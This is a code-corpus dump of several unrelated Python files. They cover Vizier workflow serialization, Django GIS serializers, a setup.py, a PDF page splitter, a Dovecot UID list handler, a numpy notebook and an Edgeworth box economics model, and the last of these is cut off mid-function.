id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1755327 | <gh_stars>1-10
# Copyright (C) 2017-2019 New York University,
# University at Buffalo,
# Illinois Institute of Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains helper methods for the webservice that are used to
serialize workflow resources.
"""
from typing import TYPE_CHECKING, Dict, Any, Optional
if TYPE_CHECKING:
from vizier.engine.project.base import ProjectHandle
from vizier.viztrail.branch import BranchHandle
from vizier.viztrail.workflow import WorkflowHandle, WorkflowDescriptor
from vizier.api.routes.base import UrlFactory
import vizier.api.serialize.base as serialize
import vizier.api.serialize.labels as labels
import vizier.api.serialize.dataset as serialds
import vizier.api.serialize.hateoas as ref
import vizier.api.serialize.module as serialmd
def EMPTY_WORKFLOW_HANDLE(
        project: "ProjectHandle",
        branch: "BranchHandle",
        urls: Optional[UrlFactory]
    ) -> Dict[str, Any]:
    """Dictionary serialization for an empty workflow. Sets most values to
    None or empty lists.

    Parameters
    ----------
    project: vizier.engine.project.base.ProjectHandle
        Handle for the containing project
    branch : vizier.viztrail.branch.BranchHandle
        Branch handle
    urls: vizier.api.routes.base.UrlFactory
        Factory for resource urls

    Returns
    -------
    dict
    """
    serialized: Dict[str, Any] = {
        'id': None,
        'createdAt': None,
        'state': -1,
        'modules': [],
        'datasets': [],
        'charts': [],
        'readOnly': False
    }
    # HATEOAS links can only be generated when a URL factory is available.
    if urls is not None:
        serialized[labels.LINKS] = WORKFLOW_HANDLE_LINKS(
            project_id=project.identifier,
            branch_id=branch.identifier,
            urls=urls
        )
    return serialized
def WORKFLOW_DESCRIPTOR(
        project: "ProjectHandle",
        branch: "BranchHandle",
        workflow: "WorkflowDescriptor",
        urls: Optional[UrlFactory]
    ) -> Dict[str, Any]:
    """Dictionary serialization for a workflow descriptor.

    Parameters
    ----------
    project: vizier.engine.project.base.ProjectHandle
        Handle for the containing project
    branch : vizier.viztrail.branch.BranchHandle
        Branch handle
    workflow: vizier.viztrail.workflow.WorkflowDescriptor
        Workflow descriptor
    urls: vizier.api.routes.base.UrlFactory
        Factory for resource urls

    Returns
    -------
    dict
    """
    serialized = {
        'id': workflow.identifier,
        'createdAt': workflow.created_at.isoformat(),
        'action': workflow.action,
        labels.COMMAND_PACKAGE: workflow.package_id,
        labels.COMMAND_ID: workflow.command_id,
    }
    # HATEOAS links can only be generated when a URL factory is available.
    if urls is not None:
        serialized[labels.LINKS] = WORKFLOW_HANDLE_LINKS(
            project_id=project.identifier,
            branch_id=branch.identifier,
            workflow_id=workflow.identifier,
            urls=urls
        )
    return serialized
def WORKFLOW_HANDLE(
        project: "ProjectHandle",
        branch: "BranchHandle",
        workflow: "WorkflowHandle",
        urls: Optional[UrlFactory]
    ) -> Dict[str, Any]:
    """Dictionary serialization for a workflow handle.
    Parameters
    ----------
    project: vizier.engine.project.base.ProjectHandle
        Handle for the containing project
    branch : vizier.viztrail.branch.BranchHandle
        Branch handle
    workflow: vizier.viztrail.workflow.WorkflowHandle
        Workflow handle
    urls: vizier.api.routes.base.UrlFactory
        Factory for resource urls
    Returns
    -------
    dict
    """
    project_id = project.identifier
    branch_id = branch.identifier
    workflow_id = workflow.identifier
    descriptor = workflow.descriptor
    # The workflow is read-only unless it is the current head of its branch.
    read_only = (branch.get_head().identifier != workflow_id)
    # Create lists of module handles and dataset handles
    modules = list()
    datasets = dict()
    dataset_names = list()
    dataobjects = dict()
    charts = dict()
    for m in workflow.modules:
        if not m.provenance.charts is None:
            # Accumulate charts across modules; later definitions with the
            # same name replace earlier ones.
            # NOTE(review): unpacking (chart_name, chart) implies that
            # provenance.charts yields pairs -- confirm it is a sequence of
            # tuples, not a dict (iterating a dict yields keys only).
            for chart_name, chart in m.provenance.charts:
                charts[chart_name] = chart
        available_charts = list()
        # Only include charts for modules that completed successful
        for artifact in m.artifacts:
            if artifact.is_dataset:
                datasets[artifact.identifier] = serialds.DATASET_DESCRIPTOR(
                    dataset=artifact,
                    project=project,
                    urls=urls
                )
                dataset_names.append(artifact.name)
            else:
                dataobjects[artifact.identifier] = serialds.ARTIFACT_DESCRIPTOR(
                    artifact=artifact,
                    project=project,
                    urls=urls
                )
        if m.is_success:
            # A chart is available only if its backing dataset has been
            # produced by some module seen so far.
            for c_handle in list(charts.values()):
                if c_handle.dataset_name in dataset_names:
                    available_charts.append(c_handle)
        modules.append(
            serialmd.MODULE_HANDLE(
                project=project,
                branch=branch,
                workflow=workflow,
                module=m,
                charts=available_charts,
                urls=urls,
                include_self=(not read_only)
            )
        )
    handle_links: Optional[Dict[str,Optional[str]]] = None
    # Only an active (still running) workflow exposes a cancel link.
    if workflow.is_active and urls is not None:
        handle_links = {
            ref.WORKFLOW_CANCEL: urls.cancel_workflow(
                project_id=project_id,
                branch_id=branch_id
            )
        }
    links = {}
    if urls is not None:
        links = { labels.LINKS : WORKFLOW_HANDLE_LINKS(
            project_id=project_id,
            branch_id=branch_id,
            workflow_id=workflow_id,
            urls=urls,
            links=handle_links
        )}
    return {
        'id': workflow_id,
        'createdAt': descriptor.created_at.isoformat(),
        'action': descriptor.action,
        labels.COMMAND_PACKAGE: descriptor.package_id,
        labels.COMMAND_ID: descriptor.command_id,
        'state': workflow.get_state().state,
        'modules': modules,
        'datasets': list(datasets.values()),
        'dataobjects': list(dataobjects.values()),
        'readOnly': read_only,
        **links
    }
def WORKFLOW_HANDLE_LINKS(
        urls: UrlFactory,
        project_id: str,
        branch_id: str,
        workflow_id: Optional[str] = None,
        links: Optional[Dict[str,Optional[str]]] = None):
    """Get basic set of HATEOAS references for workflow handles.

    For an empty workflow the identifier is None. In that case the result
    will not contain a self reference.

    Parameters
    ----------
    urls: vizier.api.routes.base.UrlFactory
        Factory for resource urls
    project_id: string
        Unique project identifier
    branch_id: string
        Unique branch identifier
    workflow_id: string, optional
        Unique workflow identifier
    links: dict, optional
        Pre-seeded references; extended in place when given

    Returns
    -------
    dict
    """
    if links is None:
        links = {}
    links[ref.WORKFLOW_APPEND] = urls.workflow_module_append(
        project_id=project_id,
        branch_id=branch_id
    )
    # References to the workflow branch and its current head
    links[ref.WORKFLOW_BRANCH] = urls.get_branch(
        project_id=project_id,
        branch_id=branch_id
    )
    links[ref.BRANCH_HEAD] = urls.get_branch_head(
        project_id=project_id,
        branch_id=branch_id
    )
    links[ref.WORKFLOW_PROJECT] = urls.get_project(project_id)
    links[ref.FILE_UPLOAD] = urls.upload_file(project_id)
    # A self reference exists only when a workflow identifier is given
    if workflow_id is not None:
        links[ref.SELF] = urls.get_workflow(
            project_id=project_id,
            branch_id=branch_id,
            workflow_id=workflow_id
        )
    return serialize.HATEOAS(links)
| StarcoderdataPython |
3356402 | <gh_stars>1-10
from rest_framework import serializers
from rest_framework_gis import serializers
from rest_framework.serializers import CharField
from origin_destination_api.models import OriginDestination, ResidenceAreaCharacteristics, WorkplaceAreaCharacteristics, Xwalk
class OriginDestinationSerializer(serializers.ModelSerializer):
    """Flat serializer exposing every OriginDestination model field."""
    class Meta:
        model = OriginDestination
        fields = '__all__'
class ResidenceAreaCharacteristicsSerializer(serializers.ModelSerializer):
    """Flat serializer exposing every ResidenceAreaCharacteristics field."""
    class Meta:
        model = ResidenceAreaCharacteristics
        fields = '__all__'
class WorkplaceAreaCharacteristicsSerializer(serializers.ModelSerializer):
    """Flat serializer exposing every WorkplaceAreaCharacteristics field."""
    class Meta:
        model = WorkplaceAreaCharacteristics
        fields = '__all__'
#
class XwalkSerializer(serializers.GeoFeatureModelSerializer):
    """GeoJSON feature serializer for Xwalk records.

    Emits each row as a GeoJSON Feature whose geometry comes from the
    4326-projected internal point and whose feature ``id`` is the 2010
    census block code.
    """
    class Meta:
        model = Xwalk
        fields = '__all__'
        geo_field = 'geom_intpt_4326'
        # GeoFeatureModelSerializer reads the Meta option ``id_field``;
        # a plain ``id`` attribute here would be silently ignored.
        id_field = 'tabblk2010'
| StarcoderdataPython |
1799836 | <reponame>josuerojasq/netacad_python
# islower() is True only when every cased character is lowercase --
# the lowercase-only counterpart of checks such as isalpha().
for sample in ("Moooo", 'moooo'):
    print(sample.islower())
3237210 | <reponame>dk107dk/cdocs<filename>setup.py
import setuptools

# Read the long description from the README for the PyPI project page.
# The encoding is given explicitly: the platform default can be non-UTF-8
# (e.g. cp1252 on Windows) and would fail on UTF-8 content in the README.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="cdocs",
    version="0.0.38",
    author="<NAME>",
    author_email="<EMAIL>",
    description="Cdocs is a super simple contextual help library",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/dk107dk/cdocs",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)
| StarcoderdataPython |
1761105 | # $ pip install pypdf2
# http://note.mokuzine.net/python-pdf-split/
# https://docs.python.jp/3/library/pathlib.html
# https://qiita.com/amowwee/items/e63b3610ea750f7dba1b
# https://blanktar.jp/blog/2015/07/python-pathlib.html
import pathlib
from PyPDF2 import PdfFileWriter, PdfFileReader
def main():
    """Split both issue collections into single-page PDFs."""
    for issue_type in ('ap', 'koudo'):
        split(issue_type)
def split(issue_type):
    """Split every PDF under issues/<issue_type> into one file per page.

    Output goes to split_issues/<issue_type>/<stem>_<page>.pdf (1-based
    page numbers); the output directory is created on demand.
    """
    base_dir = pathlib.Path(__file__).resolve().parent
    src_dir = base_dir.joinpath('issues').joinpath(issue_type)
    dst_dir = base_dir.joinpath('split_issues').joinpath(issue_type)
    if not dst_dir.exists():
        dst_dir.mkdir(parents=True)
    # Every file in the source directory is treated as a PDF issue.
    for pdf_path in list(src_dir.glob('*')):
        with pdf_path.open('rb') as src_file:
            reader = PdfFileReader(src_file, strict=False)
            for page_no in range(reader.getNumPages()):
                writer = PdfFileWriter()
                writer.addPage(reader.getPage(page_no))
                out_path = dst_dir.joinpath(f'{pdf_path.stem}_{page_no + 1}.pdf')
                with out_path.open('wb') as dst_file:
                    writer.write(dst_file)
# Run the splitter only when executed as a script, not on import.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
1794486 |
import hashlib
import struct
from collections import OrderedDict
from typing import IO, Any, Optional, Iterable, Mapping, Dict, \
NamedTuple, ClassVar, TypeVar, Type
from pymap.mailbox import MailboxSnapshot
from .io import FileWriteable
__all__ = ['Record', 'UidList']
_UDT = TypeVar('_UDT', bound='UidList')
class Record(NamedTuple):
    """A single record parsed from the UID list file.

    Args:
        uid: The message UID of the record.
        fields: The metadata fields of the record.
        filename: The filename of the record.
    """

    uid: int
    fields: Mapping[str, Any]
    filename: str

    @property
    def key(self) -> str:
        """The :class:`~mailbox.Maildir` key value."""
        # The maildir key is everything before the first ':' separator;
        # a filename without ':' is its own key.
        key, _, _ = self.filename.partition(':')
        return key
class UidList(FileWriteable):
    """Maintains the file with UID mapping to maildir files.

    Args:
        base_dir: The directory of the file.
        uid_validity: The UID validity value.
        next_uid: The next assignable message UID value.
        global_uid: The 128-bit global mailbox UID.
    """

    #: The UID list file name, stored in the mailbox directory.
    FILE_NAME: ClassVar[str] = 'dovecot-uidlist'

    #: The UID list lock file, stored adjacent to the UID list file.
    LOCK_FILE: ClassVar[str] = 'dovecot-uidlist.lock'

    def __init__(self, base_dir: str, uid_validity: int,
                 next_uid: int, global_uid: Optional[bytes] = None) -> None:
        super().__init__()
        self._base_dir = base_dir
        self.uid_validity = uid_validity
        self.next_uid = next_uid
        # When no global UID is given, derive a deterministic one from the
        # directory path and the UID validity value.
        self.global_uid = global_uid or self._create_guid(base_dir)
        # Insertion-ordered UID -> Record mapping; order is preserved when
        # the file is written back out.
        self._records: Dict[int, Record] = OrderedDict()

    @property
    def records(self) -> Iterable[Record]:
        """The records contained in the UID list file."""
        return self._records.values()

    def get(self, uid: int) -> Record:
        """Get a single record by its UID.

        Args:
            uid: The message UID.

        Raises:
            KeyError: The UID does not exist.
        """
        return self._records[uid]

    def get_all(self, uids: Iterable[int]) -> Mapping[int, Record]:
        """Get records by a set of UIDs.

        Unknown UIDs are silently skipped rather than raising.

        Args:
            uids: The message UIDs.
        """
        return {uid: self._records[uid] for uid in uids
                if uid in self._records}

    def set(self, rec: Record) -> None:
        """Add or update the record in the UID list file."""
        self._records[rec.uid] = rec

    def remove(self, uid: int) -> None:
        """Remove the record from the UID list file.

        Raises:
            KeyError: The UID does not exist.
        """
        del self._records[uid]

    @classmethod
    def _build_line(cls, rec: Record) -> str:
        # Serialize one record as "<uid> <key><value>... :<filename>\r\n";
        # fields are sorted by key for a stable, reproducible output.
        parts = ['%d' % rec.uid]
        for key, val in sorted(rec.fields.items()):
            parts.append(' ')
            parts.append(key[0:1])
            parts.append(str(val))
        parts.append(' :')
        parts.append(rec.filename)
        parts.append('\r\n')
        return ''.join(parts)

    @classmethod
    def _read_line(cls, line: str) -> Record:
        # Inverse of _build_line: the filename follows the first ':'; the
        # part before it holds the UID and the single-letter field keys.
        before, filename = line.split(':', 1)
        fields: Dict[str, str] = {}
        data = before.split(' ')
        num = int(data[0])
        for col in data[1:]:
            if col:
                # First character is the field key, the rest is its value.
                fields[col[0]] = col[1:]
        return Record(num, fields, filename.rstrip())

    @classmethod
    def _read_guid_hex(cls, field: str) -> bytes:
        # Parse the hex GUID string as two 64-bit halves into 16 bytes.
        split = int(len(field) / 2)
        left, right = int(field[0:split], 16), int(field[split:], 16)
        return struct.pack('=QQ', left, right)

    @classmethod
    def _read_header(cls: Type[_UDT], base_dir: str, line: str) -> _UDT:
        # Header format: "3 V<uid_validity> N<next_uid> G<guid-hex>".
        data = line.split()
        if data[0] != '3':
            # Only version 3 of the dovecot-uidlist format is supported.
            raise ValueError(line)
        uid_validity: Optional[int] = None
        next_uid: Optional[int] = None
        global_uid: Optional[bytes] = None
        for field in data[1:]:
            if field[0] == 'V':
                uid_validity = int(field[1:])
            elif field[0] == 'N':
                next_uid = int(field[1:])
            elif field[0] == 'G':
                global_uid = cls._read_guid_hex(field[1:])
        if uid_validity is None or next_uid is None or global_uid is None:
            # All three header fields are mandatory.
            raise ValueError(line)
        return cls(base_dir, uid_validity, next_uid, global_uid)

    def _create_guid(self, base_dir: str) -> bytes:
        # Deterministic 16-byte GUID: SHA-256 over path + UID validity.
        ret = hashlib.sha256()
        ret.update(base_dir.encode('utf-8', 'replace'))
        ret.update(struct.pack('=L', self.uid_validity))
        return ret.digest()[0:16]

    def _get_guid_hex(self) -> str:
        # NOTE(review): format(..., 'x') drops leading zeros of each 64-bit
        # half, so the hex form is not always 32 characters -- confirm that
        # _read_guid_hex can round-trip such values correctly.
        left, right = struct.unpack('=QQ', self.global_uid)
        return format(left, 'x') + format(right, 'x')

    def _build_header(self) -> str:
        return ''.join(['3 V', str(self.uid_validity),
                        ' N', str(self.next_uid),
                        ' G', self._get_guid_hex(), '\r\n'])

    @classmethod
    def get_file(cls) -> str:
        return cls.FILE_NAME

    @classmethod
    def get_lock(cls) -> str:
        return cls.LOCK_FILE

    def get_dir(self) -> str:
        return self._base_dir

    @classmethod
    def get_default(cls: Type[_UDT], base_dir: str) -> _UDT:
        # Fresh mailbox: new UID validity, first assignable UID is 1.
        return cls(base_dir, MailboxSnapshot.new_uid_validity(), 1)

    def write(self, fp: IO[str]) -> None:
        # Header line first, then one line per record in insertion order.
        fp.write(self._build_header())
        for rec in self.records:
            fp.write(self._build_line(rec))

    @classmethod
    def open(cls: Type[_UDT], base_dir: str, fp: IO[str]) -> _UDT:
        # Consumes only the header line; records are loaded by read().
        header = fp.readline()
        ret = cls._read_header(base_dir, header)
        return ret

    def read(self, fp: IO[str]) -> None:
        # Assumes the header line has already been consumed (see open()).
        for line in fp:
            self.set(self._read_line(line))
| StarcoderdataPython |
4834770 | <filename>sample.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# In[1]:
# Jupyter-notebook export: the "# In[n]:" markers are cell boundaries and
# the bare expressions (e.g. ``c`` on its own line) only display a value in
# a notebook -- as a plain script they are no-ops.
import numpy as np
# 3x4 integer matrix used for the indexing/reshaping examples below.
c = np.array([[1,2,3,4],[5,6,7,8],[9,8,7,6]],int)
type(c)
# In[2]:
c
# In[3]:
c[1,1]
# In[4]:
c[2,3]
# In[5]:
c[2,0]
# In[6]:
# Reshape the 3x4 matrix into 4x3.
k=c.reshape(4,3)
# In[7]:
k
# In[8]:
c.ndim
# In[10]:
c.shape
# In[4]:
# pandas is imported but never used in this export.
import pandas as pd
# In[6]:
# numpy is re-imported by later notebook cells; redundant but harmless.
import numpy as np
a=np.arange(5)
# In[7]:
a
# In[8]:
a=np.ones([3,3])
# In[9]:
a
# In[10]:
import numpy as np
a=np.arange(5)
# In[11]:
a1=np.ones([3,2])
# In[12]:
a1
# In[ ]:
| StarcoderdataPython |
144683 | import numpy as np
import matplotlib.pyplot as plt
from math import sqrt, copysign
from scipy.optimize import brenth
from scipy.optimize import fsolve,fmin_l_bfgs_b,fmin_cg,fminbound
def sign(x):
    """Return the sign of ``x``: 0 for zero, otherwise +/-1 (as a float)."""
    if x == 0:
        return 0
    return copysign(1, x)
def f_None(f, x):
    """Return ``f(x)``, or ``None`` if evaluating ``f`` raises.

    Used to probe functions at points where they may be undefined
    (division by zero, domain errors, ...).
    """
    try:
        return f(x)
    # Catch Exception, not a bare ``except:`` -- the bare form would also
    # swallow KeyboardInterrupt and SystemExit.
    except Exception:
        return None
def correct(x, y, f, L):
    """Return ``y`` when the point (x, y) lies on the level curve f == L.

    ``L`` is the level of the function ``f``; if the bound was touched
    (``f(x, y)`` is more than ``eps`` away from ``L``) return ``None``.
    """
    eps = 10e-5
    return y if abs(f(x, y) - L) <= eps else None
"""
if output can't be produced, return 0, if there's division by zero, then it looks for the limit and returns it
"""
def _(f,*x):
    # Evaluate f(*x); a None result is mapped to +inf, and a
    # ZeroDivisionError triggers a numeric probe of f near zero to decide
    # whether a finite limit exists.
    try:
        out=f(*x)
        if out is None:
            return float("inf")
        else:
            return out
    except ZeroDivisionError:
        # NOTE(review): the probes below depend only on len(x), not on the
        # point where f actually blew up -- the "limit" is always taken
        # along the diagonal approaching 0.
        l=len(x)
        # Compare differences of f at geometrically shrinking arguments:
        # if the differences keep shrinking the sequence looks convergent
        # and f at 1e-10 is returned as the limit; otherwise a signed
        # infinity (matching the sign of f near 0) is returned.
        eps=abs(f(*[1e-02]*l)-f(*[1e-04]*l))
        if abs(f(*[1e-04]*l)-f(*[1e-06]*l))<eps and abs(f(*[1e-06]*l)-f(*[1e-08]*l))<eps:
            return f(*[1e-10]*l)
        else:
            return sign(f(*[1e-10]*l))*float("inf")
def fst(X):
    """Return the list of first components of the pairs in ``X``."""
    return [pair[0] for pair in X]
def snd(X):
    """Return the list of second components of the pairs in ``X``."""
    return [pair[1] for pair in X]
def unpack(X):
    """Unpack [(X_1, Y_1), ..., (X_n, Y_n)] into [[X_1, ..., X_n], [Y_1, ..., Y_n]]."""
    firsts = fst(X)
    seconds = snd(X)
    return [firsts, seconds]
def rootalt(f, a, b):
    """Find a root of ``f`` on [a, b] with brenth.

    When brenth rejects the interval (endpoint values share a sign) the
    interval is nudged: the left end and then the right end are shifted
    by ``eps``, alternating, until brenth succeeds or the budget runs
    out; ``None`` is returned on failure.
    """
    eps = (b - a) / 64.0
    shift_left_end = True
    attempts = 10
    while abs(a - b) > eps and attempts > 0:
        attempts -= 1
        try:
            return brenth(f, a, b)
        except ValueError:
            if shift_left_end:
                a = a + eps
            else:
                b = b + eps
            shift_left_end = not shift_left_end
    return None
def root(f, a, b):
    """Root of ``f`` on [a, b].

    While the endpoint values share a sign the interval is shrunk
    (left end up, then right end down, alternating).  Then brenth is
    attempted; if it still rejects the interval, fall back to a
    bounded minimization over the original interval.
    """
    a_init, b_init = a, b
    eps = (b - a) / 16.0
    move_left = True
    tries = 12
    while abs(a - b) > eps and tries > 0 and f(a) * f(b) > 0:
        tries -= 1
        if move_left:
            a = a + eps
        else:
            b = b - eps
        move_left = not move_left
    try:
        return brenth(f, a, b)
    except ValueError:
        return fminbound(f, a_init, b_init)
def root2(f, a, b):
    """Minimize ``f`` by conjugate gradient, starting from the interval midpoint."""
    midpoint = (a + b) / 2.0
    return fmin_cg(f, midpoint, disp=False)[0]
def root3(f, a, b):
    """Minimize ``f`` over [a, b] with L-BFGS-B, starting from the midpoint.

    Returns the raw ``fmin_l_bfgs_b`` result tuple ``(x, fmin, info)``.
    """
    # bounds must be one (min, max) pair per variable -- the original
    # ``bounds=[a, b]`` passed two scalars and could never run -- and
    # approx_grad is required because ``f`` returns only the function
    # value, not a (value, gradient) pair.
    return fmin_l_bfgs_b(func=f, x0=(a + b) / 2.0, bounds=[(a, b)],
                         approx_grad=True)
def prime(f, dt=10e-3):
    """Two-point (central difference) numerical derivative of ``f``."""
    def derivative(x):
        return (f(x + dt) - f(x - dt)) / (2 * dt)
    return derivative
def MRS(u):
    """Marginal rate of substitution of a utility function u(x, y).

    Returns a function (x, y) -> u_x / u_y built from numerical
    partial derivatives of ``u``.
    """
    def partial_x(x, y):
        return prime(lambda z: u(z, y))(x)

    def partial_y(x, y):
        return prime(lambda z: u(x, z))(y)

    return lambda x, y: partial_x(x, y) / partial_y(x, y)
class EdgeBoxParameter:
    """Edgeworth Box display parameters: what to show on the plot.

    Args:
        N: grid resolution (number of sample points per axis).
        pareto, core, eq, budget: flags selecting which curves to draw.
    """

    def __init__(self, N, pareto=True, core=True, eq=True, budget=True):
        self.N = N
        self.pareto = pareto
        self.core = core
        self.eq = eq
        self.budget = budget


defaultEBP = EdgeBoxParameter(100)
class EdgeBox():
    """Edgeworth box for a two-agent, two-good exchange economy.

    Computes the Pareto set, the core, the competitive (Walrasian)
    equilibrium and the budget line from the agents' utility functions
    and initial endowments, and can plot the whole box.

    Args:
        u1, u2: utility functions u(x, y) of the two participants.
        IE1, IE2: initial endowments [x, y] of the two participants.
        EBP: display options (EdgeBoxParameter).
    """
    def __init__(self,u1,u2,IE1,IE2,EBP=defaultEBP):
        # NOTE(review): the default EBP is a shared module-level instance;
        # mutating it through one box affects every box using the default.
        self.core=0
        self.pareto=0
        self.eq=0
        self.p=[None,1]
        self.p_weighted=[None,None]
        self.u1=u1
        self.u2=u2
        # Participant 2's utility expressed in participant 1's coordinates.
        self.u2_compl=lambda x,y: u2(self.IE[0]-x,self.IE[1]-y)
        self.IE1=IE1
        self.IE2=IE2
        # Total endowment of the economy (the box dimensions).
        self.IE=[IE1[0]+IE2[0],IE1[1]+IE2[1]]
        self.EBP=EBP
        self.dt=min(self.IE)/float(EBP.N)
        # Interior sample grids; endpoints are pulled in by dt to avoid
        # evaluating utilities on the box boundary.
        self.X=np.linspace(self.dt,self.IE[0]-self.dt,EBP.N)
        self.Y=np.linspace(self.dt,self.IE[1]-self.dt,EBP.N)
        self.calc_init()
        self.calc()
    def calc(self):
        """
        calculate all solutions of the box
        """
        self.calc_pareto()
        self.calc_core()
        self.calc_eq()
        self.calc_budget()
    def calc_init(self):
        # Indifference curves through the initial endowment, for both agents.
        # NOTE(review): the bare call below discards its result and looks
        # redundant -- confirm it has no intended side effect.
        self.u1(*self.IE1)
        self.UIE1=self.u1(*self.IE1) # utility of the 1-st player at her initial endowment
        self.UIE2=self.u2(*self.IE2) # utility of the 2-nd player at her initial endowment
        self.u_ie_1=lambda x: root(lambda y: self.u1(x,y)-self.UIE1,self.Y[0],self.Y[-1]) # utility function at initial endowment of the 1-st participant
        self.u_ie_2=lambda x: root(lambda y: self.u2(x,y)-self.UIE2,self.Y[0],self.Y[-1]) # utility function at initial endowment of the 2-nd participant
        self.u_ie_2_compl=lambda x: -self.u_ie_2(self.IE[0]-x)+self.IE[1] # utility function at initial endowment of the 2-nd participant in terms of the 1-st
        # Sample both curves on the X grid; correct() drops points that
        # drifted off the level set, f_None() drops failed evaluations.
        U1 = list(map(lambda x: correct(x,f_None(self.u_ie_1,x),self.u1,self.UIE1),self.X))
        U2 = list(map(lambda x: correct(x,f_None(self.u_ie_2_compl,x),self.u2_compl,self.UIE2),self.X))
        self.U1 = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U1)))
        self.U2 = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U2)))
        # Extreme (lowest / highest y) points of each sampled curve.
        U1_sort = sorted(self.U1,key=lambda x: x[1])
        U2_sort = sorted(self.U2,key=lambda x: x[1])
        if len(U1_sort)>0:
            self.U1_min=U1_sort[0]
            self.U1_max=U1_sort[-1]
        else:
            self.U1_min=None
            self.U1_max=None
        if len(U2_sort)>0:
            self.U2_min=U2_sort[0]
            self.U2_max=U2_sort[-1]
        else:
            self.U2_min=None
            self.U2_max=None
        self._B=lambda x,y,p: y-(p*(self.IE1[0]-x)+self.IE1[1]) # budget constraint
    def calc_pareto(self):
        # The Pareto set is where the agents' marginal rates of
        # substitution coincide (MRS1(x, y) == MRS2 at the mirrored point).
        self.MRS1=MRS(self.u1) # marginal rate of substitution of the 1st participant
        self.MRS2=MRS(self.u2) # marginal rate of substitution of the 2nd participant
        self._pareto=lambda x: root(lambda y: _(self.MRS1,x,y)-_(self.MRS2,self.IE[0]-x,self.IE[1]-y),self.Y[0],self.Y[-1]) # Pareto solutions in functional form
        P = list(map(lambda x: f_None(self._pareto,x),self.X[1:-1]))
        self.PARETO=list(zip(self.X[1:-1],P)) # set of some Pareto solution points (enough to draw it)
        self._Bx=lambda x: root(lambda y: self._B(x,y,self.MRS1(x,y)),self.Y[0],self.Y[-1])
        # Intersections of the Pareto set with each agent's endowment
        # indifference curve: the endpoints of the core.
        PU1_X=root(lambda x: _(self._pareto,x)-_(self.u_ie_1,x),self.U1_min[0],self.U1_max[0])
        PU2_X=root(lambda x: _(self._pareto,x)-_(self.u_ie_2_compl,x),self.U2_min[0],self.U2_max[0])
        PU1_Y=self.u_ie_1(PU1_X)
        PU2_Y=self.u_ie_2_compl(PU2_X)
        self.PU1=[PU1_X,PU1_Y]
        self.PU2=[PU2_X,PU2_Y]
        # NOTE(review): _Bx is assigned twice; this second definition (with
        # the _-wrapped, limit-tolerant calls) overrides the one above.
        self._Bx=lambda x: root(lambda y: _(self._B,x,y,_(self.MRS1,x,y)),self.Y[0],self.Y[-1])
    def calc_core(self):
        # The core: the part of the Pareto set between PU1 and PU2.
        CORE_X = list(filter(lambda x: x>=self.PU1[0] and x<=self.PU2[0], self.X))
        CORE_Y = list(map(lambda x: self._pareto(x), CORE_X))
        self.CORE = list(zip(CORE_X,CORE_Y)) # set of some solutions in the core (could be one, could be many or none)
    def calc_eq(self):
        # Competitive equilibrium: the point of the core where the Pareto
        # set meets the budget-tangency curve _Bx.
        EQ_X1=root(lambda x: _(self._pareto,x)-_(self._Bx,x),self.PU1[0],self.PU2[0])
        EQ_Y1=self._pareto(EQ_X1)
        EQ_X2=self.IE[0]-EQ_X1
        EQ_Y2=self.IE[1]-EQ_Y1
        self.EQ1=[EQ_X1,EQ_Y1] # equilibrium solution for the 1st participant
        self.EQ2=[EQ_X2,EQ_Y2] # equilibrium solution for the 2nd participant
        self.p=self.MRS1(*self.EQ1) # price vector
        self.p_weighted=[self.p/(self.p+1),1/(self.p+1)]
        self.UEQ1=self.u1(*self.EQ1) # value of utility function of the 1st participant at her equilibrium point (functional form)
        self.UEQ2=self.u2(*self.EQ2) # value of utility function of the 2nd participant at her equilibrium point (functional form)
        # Indifference curves through the equilibrium, sampled like in
        # calc_init().
        self.u_eq_1=lambda x: root(lambda y: self.u1(x,y)-self.UEQ1,self.Y[0],self.Y[-1])
        self.u_eq_2=lambda x: root(lambda y: self.u2(x,y)-self.UEQ2,self.Y[0],self.Y[-1])
        self.u_eq_2_compl=lambda x: -self.u_eq_2(self.IE[0]-x)+self.IE[1]
        U1_EQ = list(map(lambda x: correct(x,f_None(self.u_eq_1,x),self.u1,self.UEQ1),self.X))
        U2_EQ = list(map(lambda x: correct(x,f_None(self.u_eq_2_compl,x),self.u2_compl,self.UEQ2),self.X))
        self.U1_EQ = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U1_EQ)))
        self.U2_EQ = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U2_EQ)))
    def calc_budget(self,price=None):
        # Budget line through the initial endowment; defaults to the
        # equilibrium price computed by calc_eq().
        if price is None:
            price=self.p
        self.Bp=lambda x: price*self.IE1[0]+self.IE1[1]-price*x # budget line (functional form)
        Budget = list(map(self.Bp,self.X)) # set of some points from the budget line
        self.BUDGET = list(zip(self.X,Budget))
    def plot(self,fname=None):
        # Draw the full box; save to fname when given, otherwise show
        # the interactive window without blocking.
        plot_endow,=plt.plot(self.IE1[0],self.IE1[1],color="white",marker="o")
        m=max(self.IE[0],self.IE[1])
        plt.axis([0,m,0,m],autoscale=False)
        plot_U1,=plt.plot(*unpack(self.U1),color="blue")
        plot_U2,=plt.plot(*unpack(self.U2),color="brown")
        plot_pareto,=plt.plot(*unpack(self.PARETO),linewidth=2,color="red")
        plot_core,=plt.plot(*unpack(self.CORE),color="black",linewidth=4)
        plot_U1_EQ,=plt.plot(*unpack(self.U1_EQ),ls='--',color="blue")
        plot_U2_EQ,=plt.plot(*unpack(self.U2_EQ),ls='--',color="brown")
        plot_budget,=plt.plot(*unpack(self.BUDGET),color="green")
        plt.plot(self.PU1[0],self.PU1[1],color="blue",marker="o")
